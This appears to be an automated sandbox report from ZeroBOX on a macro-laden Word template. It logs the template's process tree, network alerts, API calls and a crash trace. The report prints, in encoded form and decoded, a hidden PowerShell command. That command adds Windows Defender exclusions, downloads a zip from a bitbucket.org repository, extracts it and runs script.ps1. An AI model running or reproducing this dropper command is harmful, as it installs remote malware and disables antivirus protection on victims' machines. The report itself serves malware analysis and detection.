Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 18, 2023, 6:58 p.m.	April 18, 2023, 7 p.m.

Size	17.5KB
Type	Microsoft Word 2007+
MD5	`175722ba98f8f2715841c2c22026b7c8`
SHA256	`9969a0b62356c03aecf524ba69c136e675792b435eaf604c12dc5d36ed9c8aae`
CRC32	`F5CD8C9F`
ssdeep	`384:tmtriu1E3VPxAYwmhr9BiNiC78QyRC6hIm6akwLWdxdIZYB3S:q11gpxAYFhTiNV8QyRp2akw6LIOw`
Yara	zip_file_format - ZIP file format Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] docx - Word 2007 file format detection

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\newf.dotm
804
- powershell.exe powershell.exe -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAGIAeQBwAGEAcwBzACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACcAQwA6AFwAXABUAGUAbQBwAFwAXAAnACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFQAZQBtAHAAXAAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AZgBvAHgAeABsAHIAZQBwAC8AcgBlAHAAbwAvAGQAbwB3AG4AbABvAGEAZABzAC8AegBpAHAALgB6AGkAcAAnACwAJwBDADoAXABcAFQAZQBtAHAAXABcAE4AZQB3AGYAaQBsAGUALgB6AGkAcAAnACkAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAnAEMAOgBcAFwAVABlAG0AcABcAFwATgBlAHcAZgBpAGwAZQAuAHoAaQBwACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAJwBDADoAXABcAFQAZQBtAHAAXABcACcAIAAtAEYAbwByAGMAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwBDADoAXABcAFQAZQBtAHAAXABcAHMAYwByAGkAcAB0AC4AcABzADEAJwAiAA==
  2212
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command "New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference -ExclusionPath 'C:\Temp\';Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming';(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/foxxlrep/repo/downloads/zip.zip','C:\\Temp\\Newfile.zip');Expand-Archive -Path 'C:\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process powershell.exe -ArgumentList 'C:\\Temp\\script.ps1'"
    2372
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\\Temp\\script.ps1
      2524

Name	Response	Post-Analysis Lookup
bitbucket.org	A 104.192.141.1	104.192.141.1

IP Address	Status	Action
104.192.141.1	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 104.192.141.1:443 -> 192.168.56.103:49170	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 104.192.141.1:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 104.192.141.1:443 -> 192.168.56.103:49168	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 104.192.141.1:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (19 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 6:58 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 18, 2023, 6:58 p.m.			0	0
IsDebuggerPresent April 18, 2023, 6:58 p.m.			0	0
IsDebuggerPresent April 18, 2023, 6:58 p.m.			0	0

Command line console output was observed (50 out of 61 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: Directory: C:\ console_handle: 0x00000023	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: Mode LastWriteTime Length Name console_handle: 0x0000002f	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: d---- 2023-04-18 오후 6:58 Temp console_handle: 0x00000037	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x0000004b	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x00000057	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x00000063	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: At line:1 char:65 console_handle: 0x0000006f	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: + New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference <<<< -Exclu console_handle: 0x0000007b	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: sionPath 'C:\Temp\';Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Ro console_handle: 0x00000087	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: aming';(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/fo console_handle: 0x00000093	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: xxlrep/repo/downloads/zip.zip','C:\\Temp\\Newfile.zip');Expand-Archive -Path 'C console_handle: 0x0000009f	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: :\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process powers console_handle: 0x000000ab	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: hell.exe -ArgumentList 'C:\\Temp\\script.ps1' console_handle: 0x000000b7	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x000000c3	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: mmandNotFoundException console_handle: 0x000000cf	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000db	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x000000fb	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x00000107	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x00000113	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: At line:1 char:108 console_handle: 0x0000011f	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: + New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference -ExclusionPa console_handle: 0x0000012b	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: th 'C:\Temp\';Add-MpPreference <<<< -ExclusionPath 'C:\Users\test22\AppData\Ro console_handle: 0x00000137	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: aming';(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/fo console_handle: 0x00000143	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: xxlrep/repo/downloads/zip.zip','C:\\Temp\\Newfile.zip');Expand-Archive -Path 'C console_handle: 0x0000014f	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: :\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process powers console_handle: 0x0000015b	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: hell.exe -ArgumentList 'C:\\Temp\\script.ps1' console_handle: 0x00000167	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x00000173	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: mmandNotFoundException console_handle: 0x0000017f	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000018b	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: At line:1 char:204 console_handle: 0x0000003b	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: + New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference -ExclusionPa console_handle: 0x00000047	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: th 'C:\Temp\';Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming' console_handle: 0x00000053	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: ;(New-Object System.Net.WebClient).DownloadFile <<<< ('https://bitbucket.org/fo console_handle: 0x0000005f	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: xxlrep/repo/downloads/zip.zip','C:\\Temp\\Newfile.zip');Expand-Archive -Path 'C console_handle: 0x0000006b	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: :\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process powers console_handle: 0x00000077	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: hell.exe -ArgumentList 'C:\\Temp\\script.ps1' console_handle: 0x00000083	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000008f	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000009b	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: The term 'Expand-Archive' is not recognized as the name of a cmdlet, function, console_handle: 0x000000bb	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: script file, or operable program. Check the spelling of the name, or if a path console_handle: 0x000000c7	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: was included, verify that the path is correct and try again. console_handle: 0x000000d3	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: At line:1 char:300 console_handle: 0x000000df	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: + New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference -ExclusionPa console_handle: 0x000000eb	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: th 'C:\Temp\';Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming' console_handle: 0x000000f7	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: ;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/foxxlrep console_handle: 0x00000103	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: /repo/downloads/zip.zip','C:\\Temp\\Newfile.zip');Expand-Archive <<<< -Path 'C console_handle: 0x0000010f	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: :\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process powers console_handle: 0x0000011b	1	1
WriteConsoleW April 18, 2023, 6:58 p.m.	buffer: hell.exe -ArgumentList 'C:\\Temp\\script.ps1' console_handle: 0x00000127	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 136 events)

Time & API	Arguments	Status	Return
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c36a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3da8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3da8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3da8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3da8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3da8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3da8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3fa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c4028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c4028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00352488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00352b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00352b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00352b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00352248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00352248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00352248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00352248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00352248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 6:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00352248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 18, 2023, 6:58 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 18, 2023, 6:58 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x754e2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x754b801a SLClose-0x28c osppc+0x2cb5 @ 0x6b252cb5 SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x6b265629 SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x6b253412 SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x6b2629af SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x663ea648 _MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x70f24a94 _MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x70f24823 _MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x707e30d3 _MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x707e2e1f _MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x70002b05 _MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x70002456 0x497b57 _MsoDwGimmeUserInstallBehavior@8+0x1798b _MsoHrShowMetSharedNotebooksDlg@20-0x7dd5a mso+0xcbfd49 @ 0x707dfd49 _MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x6fd208cc _MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x6fd0fa61 _MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x6fd0f808 _MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x6fd0f7c8 _MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x6fb43b6d _MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x6fb422ad _MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x6fcd522d _MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x6fcd5189 _MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x6fcd407b _MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x6fcd3fa9 _MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x6fcd3f6b DllGetClassObject+0x6de67 DllGetLCID-0x1df82c wwlib+0x72aca @ 0x72162aca DllGetClassObject+0x6de29 DllGetLCID-0x1df86a wwlib+0x72a8c @ 0x72162a8c DllGetClassObject+0x864b4 DllGetLCID-0x1c71df wwlib+0x8b117 @ 0x7217b117 DllGetClassObject+0x66a5f DllGetLCID-0x1e6c34 wwlib+0x6b6c2 @ 0x7215b6c2 DllGetClassObject+0x63c72 DllGetLCID-0x1e9a21 wwlib+0x688d5 @ 0x721588d5 wdCommandDispatch-0x370 winword+0x15c4 @ 0xdf15c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0xdf1558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc004f011 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 2936192 registers.edi: 2936356 registers.eax: 2936192 registers.ebp: 2936272 registers.edx: 0 registers.ebx: 2937408 registers.esi: 3221549073 registers.ecx: 2147483648	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

April 18, 2023, 6:58 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x754e2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x754b801a
SLClose-0x28c osppc+0x2cb5 @ 0x6b252cb5
SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x6b265629
SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x6b253412
SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x6b2629af
SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x663ea648
_MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x70f24a94
_MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x70f24823
